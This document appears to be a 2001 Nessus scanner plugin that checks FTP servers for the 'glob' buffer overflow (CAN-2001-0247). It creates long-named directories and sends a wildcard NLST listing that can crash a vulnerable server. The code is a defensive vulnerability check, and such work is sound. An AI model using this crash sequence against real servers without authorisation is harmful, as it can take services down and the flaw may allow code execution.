1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
|
#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
#
# See the Nessus Scripts License for details
#
if(description)
{
script_id(10648);
script_cve_id("CAN-2001-0247");
name["english"] = "ftp 'glob' overflow";
name["francais"] = "Dpassement de buffer ftp par 'glob'";
script_name(english:name["english"],
francais:name["francais"]);
desc["english"] = "
It was possible to make the remote FTP server crash
by creating a huge directory structure and then
attempting to listing it using wildcards.
This is usually known as the 'ftp glob overflow' attack.
It is very likely that an attacker can use this
flaw to execute arbitrary code on the remote
server. This will give him a shell on your system,
which is not a good thing.
Solution : upgrade your FTP server and/or libc
Consider removing directories writable by 'anonymous'.
Risk factor : High";
desc["francais"] = "
Il s'est avr possible de faire planter le serveur
FTP distant en y crant une grande structure de
rpertoires puis en la listant l'aide de wildcards.
On appelle souvent ce problme le 'dpassement de buffer
ftpd par glob'.
Il est trs probable qu'un pirate puisse utiliser ce
problme pour executer du code arbitraire sur le serveur
distant, ce qui lui donnera un shell sur votre systme,
ce qui n'est pas une bonne chose.
Solution : mettez jour votre serveur FTP ou libc, ou contactez
votre vendeur pour un patch.
Facteur de risque : Elev";
script_description(english:desc["english"],
francais:desc["francais"]);
script_summary(english:"Checks if the remote ftp can be buffer overflown",
francais:"Dtermine si le serveur ftp distant peut etre soumis a un dpassement de buffer");
script_category(ACT_DENIAL);
script_family(english:"FTP");
script_family(francais:"FTP");
script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison",
francais:"Ce script est Copyright (C) 2001 Renaud Deraison");
script_dependencie("find_service.nes", "ftp_write_dirs.nes");
script_require_keys("ftp/login", "ftp/writeable_dir");
script_require_ports("Services/ftp", 21);
exit(0);
}
#
# The script code starts here :
#
# First, we need access
login = get_kb_item("ftp/login");
password = get_kb_item("ftp/password");
# Then, we need a writeable directory
wri = get_kb_item("ftp/writeable_dir");
port = get_kb_item("Services/ftp");
if(!port)port = 21;
# Connect to the FTP server
soc = open_sock_tcp(port);
if(soc)
{
if(login && wri)
{
if(ftp_log_in(socket:soc, user:login, pass:password))
{
# We are in
c = string("CWD ", wri, "\r\n");
send(socket:soc, data:c);
b = recv(socket:soc, length:1024);
cwd = string("CWD ", crap(255), "\r\n");
mkd = string("MKD ", crap(255), "\r\n");
#
# Repeat the same operation 20 times. After the 20th, we
# assume that the server is immune (or has a bigger than
# 5Kb buffer, which is unlikely
#
for(i=0;i<5;i=i+1)
{
send(socket:soc, data:mkd);
b = recv(socket:soc, length:1024);
if(!("257 " >< b)){
if(!("ile exists" >< b))
{
set_kb_item(name:"ftp/no_mkdir", value:TRUE);
exit(0);
}
}
}
port2 = ftp_get_pasv_port(socket:soc);
soc2 = open_sock_tcp(port2);
send(socket:soc, data:string("NLST ", wri, "/X*/X*/X*/X*/X*\r\n"));
b = recv(socket:soc, length:4096);
if(!b){
security_hole(port);
set_kb_item(name:"ftp/wu_ftpd_overflow", value:TRUE);
exit(0);
}
send(socket:soc,data:cwd);
b = recv(socket:soc, length:1024);
quit = string("QUIT\r\n");
send(socket:soc, data:quit);
close(soc);
}
}
}
|
